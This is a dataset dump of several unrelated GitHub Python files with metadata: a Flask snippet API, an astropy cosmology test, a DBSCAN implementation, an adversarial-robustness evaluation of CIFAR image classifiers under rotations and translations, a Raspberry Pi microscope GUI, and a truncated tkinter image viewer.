send_from_directory(os.path.join(os.path.dirname(__file__), 'templates'), 'index1.html')\n\n@app.route('/get_all_files', methods=['GET'])\ndef get_all_files():\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Fetch all code snippets\n results = query.all()\n\n # Organize the results in a list of dictionaries\n organized_data = []\n for result in results:\n organized_data.append({\n 'script_name': result.name,\n 'description': result.description,\n 'id': result.id,\n 'file_path': result.file_path,\n 'code': result.code,\n 'latest_commit': result.latest_commit\n })\n\n # Return JSON response\n return jsonify(organized_data)\n\n@app.route('/view_json')\ndef view_json():\n # Get the code snippets as a JSON string\n json_data = get_all_files().get_data(as_text=True)\n\n return render_template('view_json.html', json_data=json_data)\n\n\n\n\ndef run():\n app.run(debug=True, use_reloader=False)\n\n# Run Flask app\nif __name__ == '__main__':\n run()\n", "repo_name": "thepwnman33/Magicus", "sub_path": "apitest.py", "file_name": "apitest.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.or_", "line_number": 59, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name.contains", "line_number": 60, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 60, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.description.contains", "line_number": 61, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.description", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 61, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.code.contains", "line_number": 62, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.code", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 92, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 98, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}]}
+{"seq_id": "30827508988", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom astropy import cosmology\nfrom astropy.cosmology import Cosmology\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.table import QTable, vstack\nfrom astropy.utils.compat import optional_deps\nfrom astropy.utils.exceptions import AstropyUserWarning\n\n\nclass CosmologyWithKwargs(Cosmology):\n def __init__(self, name=\"cosmology with kwargs\", meta=None, **kwargs):\n super().__init__(name=name, meta=meta)\n\n\ncosmo_instances = [\n getattr(cosmology.realizations, name) for name in cosmology.parameters.available\n]\ncosmo_instances.append(CosmologyWithKwargs())\n\n\ndef teardown_module(module):\n # pop CosmologyWithKwargs from registered classes\n # but don't error b/c it fails in parallel\n _COSMOLOGY_CLASSES.pop(CosmologyWithKwargs.__qualname__, None)\n\n\n###############################################################################\n\n@pytest.mark.parametrize(\"expected\", cosmo_instances)\ndef test_to_from_mapping_instance(expected):\n # ------------\n # To Mapping\n params = expected.to_format('mapping')\n\n assert isinstance(params, dict)\n assert params[\"cosmology\"] is expected.__class__\n assert params[\"name\"] == expected.name\n\n # ------------\n # From Mapping\n params[\"mismatching\"] = \"will error\"\n\n # tests are different if the last argument is a **kwarg\n if tuple(expected._init_signature.parameters.values())[-1].kind == 4:\n got = Cosmology.from_format(params, format=\"mapping\")\n\n assert got.__class__ == expected.__class__\n assert got.name == expected.name\n assert \"mismatching\" not in got.meta\n\n return # don't continue testing\n\n # read with mismatching parameters errors\n with pytest.raises(TypeError, match=\"there are unused parameters\"):\n Cosmology.from_format(params, format=\"mapping\")\n\n # unless mismatched are moved to meta\n got = Cosmology.from_format(params, format=\"mapping\", move_to_meta=True)\n assert got.__class__ == expected.__class__\n assert got == expected\n assert got.meta[\"mismatching\"] == \"will error\"\n\n # it won't error if everything matches up\n params.pop(\"mismatching\")\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got.__class__ == expected.__class__\n assert got == expected\n\n # and it will also work if the cosmology is a string\n params[\"cosmology\"] = params[\"cosmology\"].__name__\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got == expected\n\n # also it auto-identifies 'format'\n got = Cosmology.from_format(params)\n assert got == expected\n", "repo_name": "CNwangbin/astropy", "sub_path": "astropy/cosmology/io/tests/test_mapping.py", "file_name": "test_mapping.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.cosmology.Cosmology", "line_number": 13, "usage_type": "name"}, {"api_name": "astropy.cosmology.realizations", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology", "line_number": 19, "usage_type": "name"}, {"api_name": "astropy.cosmology.parameters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES.pop", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 48, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 48, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 57, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 58, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 58, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 61, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 61, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 74, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 74, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 78, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 78, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "9261746599", "text": "# DBSCAN聚类\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport copy\r\ndef find_neighbor(j, x, eps):\r\n N = list()\r\n for i in range(x.shape[0]):\r\n # 计算欧式距离\r\n temp = np.sqrt(np.sum(np.square(x[j] - x[i])))\r\n if temp <= eps:\r\n N.append(i)\r\n return set(N)\r\ndef DBSCAN(X, eps, min_Pts):\r\n k = -1\r\n neighbor_list = [] # 用来保存每个数据的邻域\r\n omega_list = [] # 核心对象集合\r\n # 初始时将所有点标记为未访问\r\n gama = set([x for x in range(len(X))])\r\n cluster = [-1 for _ in range(len(X))] # 聚类\r\n for i in range(len(X)):\r\n neighbor_list.append(find_neighbor(i, X, eps))\r\n if len(neighbor_list[-1]) >= min_Pts:\r\n # 将样本加入核心对象集合\r\n omega_list.append(i)\r\n # 转化为集合便于操作\r\n omega_list = set(omega_list)\r\n while len(omega_list) > 0:\r\n gama_old = copy.deepcopy(gama)\r\n # 随机选取一个核心对象\r\n j = random.choice(list(omega_list))\r\n k = k + 1\r\n Q = list()\r\n Q.append(j)\r\n gama.remove(j)\r\n while len(Q) > 0:\r\n q = Q[0]\r\n Q.remove(q)\r\n if len(neighbor_list[q]) >= min_Pts:\r\n delta = neighbor_list[q] &gama\r\n deltalist = list(delta)\r\n for i in range(len(delta)):\r\n Q.append(deltalist[i])\r\n gama = gama - delta\r\n Ck = gama_old - gama\r\n Cklist = list(Ck)\r\n for i in range(len(Ck)):\r\n cluster[Cklist[i]] = k\r\n omega_list = omega_list - Ck\r\n return cluster\r\nX1, y1 = datasets.make_circles(n_samples=2000, factor=.6, noise=.02)\r\nX2, y2 = datasets.make_blobs(n_samples=400, n_features=2, centers=[[1.2, 1.2]], cluster_std=[[.1]], random_state=9)\r\nX = np.concatenate((X1, X2))\r\neps = 0.08\r\nmin_Pts = 10\r\nbegin = time.time()\r\nC = DBSCAN(X, eps, min_Pts)\r\nend = time.time()\r\nplt.figure()\r\nplt.scatter(X[:, 0], X[:, 1], c=C)\r\nplt.show()", "repo_name": "HuichuanLI/play_with_machine_learning_book", "sub_path": "一些经典的机器学习的实现/DBSCAN.py", "file_name": "DBSCAN.py", "file_ext": "py", "file_size_in_byte": 2099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 12, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_circles", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 53, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}]}
+{"seq_id": "34177809772", "text": "from __future__ import print_function\nimport os\nimport itertools\nimport re\nimport argparse\nimport logging\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom datasets import SemiSupervisedDataset, DATASETS\nfrom torchvision import transforms\nimport torch.backends.cudnn as cudnn\nfrom utils import get_model\nimport spatial\nimport json\n\nNUM_ROT = 31\nNUM_TRANS = 5\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\ndef transform(x, rotation, translation):\n assert x.shape[1] == 3\n\n with torch.no_grad():\n translated = spatial.transform(x, rotation, translation)\n\n return translated\n\n\ndef get_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071):\n\n def calc_correct(inp):\n output = model(inp)\n targets = y.repeat([inp.shape[0]])\n return (output.argmax(dim=1) == targets).long()\n\n with torch.no_grad():\n rots = torch.linspace(-max_rot, max_rot, steps=NUM_ROT)\n trans = torch.linspace(-max_trans, max_trans, steps=NUM_TRANS)\n tfms = torch.tensor(list(itertools.product(rots, trans, trans))).cuda(device=device)\n all_rots = tfms[:, 0]\n all_trans = tfms[:, 1:]\n\n ntfm = all_rots.shape[0]\n transformed = transform(X.repeat([ntfm, 1, 1, 1]), all_rots, all_trans)\n torch.clamp(transformed, 0, 1.0)\n\n # X_pgd = Variable(torch.zeros(X.data.shape), requires_grad=True)\n MAX_BS = 128\n i = 0\n while i < ntfm:\n to_do = transformed[i:i+MAX_BS]\n is_correct = calc_correct(to_do)\n argmin = is_correct.argmin()\n if is_correct[argmin] == 0:\n return transformed[i+argmin:i+argmin+1].squeeze_(0)\n\n i += MAX_BS\n else:\n return transformed[0:1].squeeze_(0)\n\n\ndef apply(func, M):\n tList = [func(m) for m in torch.unbind(M, dim=0)]\n return torch.stack(tList, dim=0)\n\n\ndef get_batch_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071, random=False, wo10=False):\n def calc_correct(inp):\n output = model(inp)\n return (output.argmax(dim=1) == y).long()\n\n if random:\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n return transformed\n\n elif wo10:\n all_transformed = []\n all_is_corrects = []\n for i in range(10):\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n all_transformed.append(transformed)\n all_is_corrects.append(calc_correct(transformed))\n aic = torch.stack(all_is_corrects, dim=0).argmin(dim=0)\n all_transformed = torch.stack(all_transformed, dim=0)\n X_pgd = []\n for j, i in enumerate(torch.unbind(aic, dim=0)):\n X_pgd.append(all_transformed[i, j])\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n else:\n # otherwise grid\n X_pgd = []\n for cur_x, cur_y in zip(torch.unbind(X, dim=0), torch.unbind(y, dim=0)):\n X_pgd.append(get_spatial_adv_example(model, cur_x, cur_y, max_rot, max_trans))\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n\n\ndef pgd_whitebox_spatial(model, X, y, max_rot=30, max_trans=0.1071, random=False, eval=False):\n wo10 = (not random and not eval)\n X_pgd = get_batch_spatial_adv_example(model, X, y, max_rot, max_trans, random=random, wo10=wo10)\n err = (model(X).data.max(1)[1] != y.data).float().sum()\n err_pgd = (model(X_pgd).data.max(1)[1] != y.data).float().sum()\n return err, err_pgd\n\n\ndef eval_adv_test_whitebox_spatial(model, device, test_loader):\n \"\"\"\n evaluate model by white-box attack\n \"\"\"\n model.eval()\n robust_err_total = 0\n natural_err_total = 0\n total = 0\n\n for data, target, unsup in test_loader:\n data, target = data.to(device), target.to(device)\n # pgd attack\n X, y = Variable(data, requires_grad=True), Variable(target)\n err_natural, err_robust = pgd_whitebox_spatial(model, X, y,\n max_rot=args.max_rot,\n max_trans=args.max_trans,\n eval=True)\n logging.info('err pgd (white-box): %g', err_robust.item())\n robust_err_total += err_robust\n natural_err_total += err_natural\n total += X.shape[0]\n natural_acc = 1.0 - (natural_err_total.item() / total)\n robust_acc = 1.0 - (robust_err_total.item() / total)\n logging.info(f'natural_accuracy: {natural_acc}')\n logging.info(f'robust_accuracy: {robust_acc}')\n stats = {'natural_accuracy': natural_acc, 'robust_accuracy': robust_acc}\n with open(os.path.join(output_dir, 'stats.json'), 'w') as outfile:\n json.dump(stats, outfile)\n\n\ndef main():\n # white-box attack\n logging.info('pgd white-box attack')\n checkpoint = torch.load(args.model_path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n num_classes = checkpoint.get('num_classes', 10)\n normalize_input = checkpoint.get('normalize_input', False)\n model = get_model(args.model, num_classes=num_classes,\n normalize_input=normalize_input)\n if not all([k.startswith('module') for k in state_dict]):\n state_dict = {'module.' + k: v for k, v in state_dict.items()}\n if use_cuda:\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n model.load_state_dict(state_dict)\n\n eval_adv_test_whitebox_spatial(model, device, test_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='PyTorch CIFAR Spatial Attack Evaluation')\n parser.add_argument('--dataset', type=str, default='cifar10',\n choices=DATASETS,\n help='The dataset')\n parser.add_argument('--test-batch-size', type=int, default=200, metavar='N',\n help='input batch size for testing (default: 200)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--max-rot', default=30, type=int, help='rotation angle')\n parser.add_argument('--max-trans', default=0.1071, type=float, help='translation')\n parser.add_argument('--num-steps', default=20,\n help='perturb number of steps')\n parser.add_argument('--step-size', default=0.003, type=float,\n help='perturb step size')\n parser.add_argument('--model-path',\n default='./checkpoints/model_cifar_wrn.pt',\n help='model for white-box attack evaluation')\n parser.add_argument('--white-box-attack', default=True,\n help='whether perform white-box attack')\n parser.add_argument('--model', '-m', default='wrn-34-10', type=str,\n help='name of the model')\n parser.add_argument('--output-suffix', '-o', default='', type=str,\n help='string to add to log filename')\n\n args = parser.parse_args()\n\n output_dir, checkpoint_name = os.path.split(args.model_path)\n epoch = int(re.search('epoch(\\d+)', checkpoint_name).group(1))\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s | %(message)s\",\n handlers=[\n logging.FileHandler(os.path.join(output_dir,\n 'attack_epoch%d%s.log' %\n (epoch, args.output_suffix))),\n logging.StreamHandler()\n ])\n logger = logging.getLogger()\n\n logging.info('PGD attack')\n logging.info('Args: %s', args)\n\n # settings\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # set up data loader\n transform_test = transforms.Compose([transforms.ToTensor(), ])\n # testset = torchvision.datasets.CIFAR10(root='data', train=False,\n # download=True,\n # transform=transform_test)\n testset = SemiSupervisedDataset(base_dataset=args.dataset,\n train=False, root='data',\n download=True,\n transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size=args.test_batch_size,\n shuffle=False, **kwargs)\n\n main()\n\n", "repo_name": "p-lambda/robust_tradeoff", "sub_path": "cifar/code/spatial_attack_cifar10.py", "file_name": "spatial_attack_cifar10.py", "file_ext": "py", "file_size_in_byte": 8863, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 27, "usage_type": "call"}, {"api_name": "spatial.transform", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 78, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 79, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 88, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.get_model", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 167, "usage_type": "call"}, {"api_name": "datasets.DATASETS", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 195, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 198, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 204, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 208, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 213, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 217, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 217, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "datasets.SemiSupervisedDataset", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 225, "usage_type": "attribute"}]}
+{"seq_id": "22307824379", "text": "from __future__ import print_function\nfrom PIL import Image, ImageTk\nimport tkinter as tki\nimport threading\nimport cv2\nimport os, time\nimport picamera\nimport picamera.array \n\nclass MicroscopeApp:\n def __init__(self, picam, pibgr):\n # store the video stream object and output path, then initialize\n # the most recently read frame, thread for reading frames, and\n # the thread stop event\n self.picam = picam\n self.frame = None\n self.thread = None\n self.stopEvent = None\n self.pibgr = pibgr\n\n # initialize the root window and image panel\n self.root = tki.Tk()\n self.panel = None\n \n # create a button, that when pressed, will take the current\n # frame and save it to file\n btn = tki.Button(self.root, text=\"Snapshot!\", command=self.takeSnapshot)\n btn.pack(side=\"bottom\", fill=\"both\", expand=\"yes\", padx=10, pady=10)\n \n # start a thread that constantly pools the video sensor for\n # the most recently read frame\n self.stopEvent = threading.Event()\n self.thread = threading.Thread(target=self.videoLoop, args=())\n self.thread.start()\n \n # set a callback to handle when the window is closed\n self.root.wm_title(\"Microscope imaging\")\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.onClose)\n\n def videoLoop(self):\n while not self.stopEvent.is_set():\n # grab the frame from the video stream and resize it\n self.picam.capture(self.pibgr, \"bgr\", use_video_port = \"True\")\n self.frame = self.pibgr.array\n frame_small = cv2.resize(self.frame, (420,300))\n \n # clear buffer(if not it occurs incorrect error)\n self.pibgr.truncate(0)\n \n image = Image.fromarray(frame_small)\n image = ImageTk.PhotoImage(image)\n\n # if the panel is not None, we need to initialize it\n if self.panel is None:\n self.panel = tki.Label(image=image)\n self.panel.image = image\n self.panel.pack(side=\"left\", padx=10, pady=10)\n \n # otherwise, simply update the panel\n else:\n self.panel.configure(image=image)\n self.panel.image = image \n\n def takeSnapshot(self):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\");\n filename = \"microscope_{}.tiff\".format(timestr)\n cv2.imwrite(filename, self.frame)\n print(\"[INFO] saved {}\".format(filename))\n\n def onClose(self):\n # set the stop event, cleanup the camera, and allow the rest of\n # the quit process to continue\n print(\"[INFO] closing...\")\n self.stopEvent.set() \n self.root.quit() \n\nif __name__ == '__main__':\n \n # initialize the video stream and allow the camera sensor to warmup\n print(\"[INFO] warming up camera...\")\n picam = picamera.PiCamera()\n time.sleep(0.5)\n picam.resolution = (1640,1232)\n time.sleep(2)\n pibgr = picamera.array.PiRGBArray(picam)\n time.sleep(0.5)\n\n # start the app\n pba = MicroscopeApp(picam,pibgr)\n pba.root.mainloop()", "repo_name": "OISL-Yonsei/raspberrypi-cam", "sub_path": "microscope.py", "file_name": "microscope.py", "file_ext": "py", "file_size_in_byte": 3165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 27, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 67, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 85, "usage_type": "call"}, {"api_name": "picamera.array", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "35681261486", "text": "from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nimg1 = ImageTk.PhotoImage(Image.open(\"a.png\"))\r\nimg2 = ImageTk.PhotoImage(Image.open(\"b.png\"))\r\nimg3 = ImageTk.PhotoImage(Image.open(\"c.png\"))\r\nimg4 = ImageTk.PhotoImage(Image.open(\"d.png\"))\r\nimg5 = ImageTk.PhotoImage(Image.open(\"e.png\"))\r\nimg_list = [img1, img2, img3, img4, img5]\r\nimage_num = 0\r\ndef forward():\r\n global imageLabel, image_num, img_list\r\n image_num = image_num + 1\r\n print(f\"{image_num}\")\r\n if image_num == (len(img_list)):\r\n forward_btn = Button(root, text=\">>\", command=forward, state=DISABLED)\r\n forward_btn.grid(row=1, column=2)\r\n else:\r\n imageLabel.grid_forget()\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef back():\r\n global imageLabel, image_num, img_list\r\n if image_num<=0:\r\n back_btn = Button(root, text=\"<<\", command=back,state=DISABLED)\r\n back_btn.grid(row=1, column=0)\r\n else:\r\n imageLabel.grid_forget()\r\n image_num -= 1\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\nimageLabel = Label(root, image=img_list[image_num])\r\nback_btn = Button(root, text=\"<<\", command=back)\r\nforward_btn = Button(root, text=\">>\", command=forward)\r\n\r\nimageLabel.grid(row=0, column=0, columnspan=3)\r\nback_btn.grid(row=1, column=0)\r\nforward_btn.grid(row=1, column=2)\r\nroot.mainloop()", "repo_name": "rayyan-24/Python-Resources", "sub_path": "Tkinter/7_image_viewer.py", "file_name": "7_image_viewer.py", "file_ext": "py", "file_size_in_byte": 1701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 7, 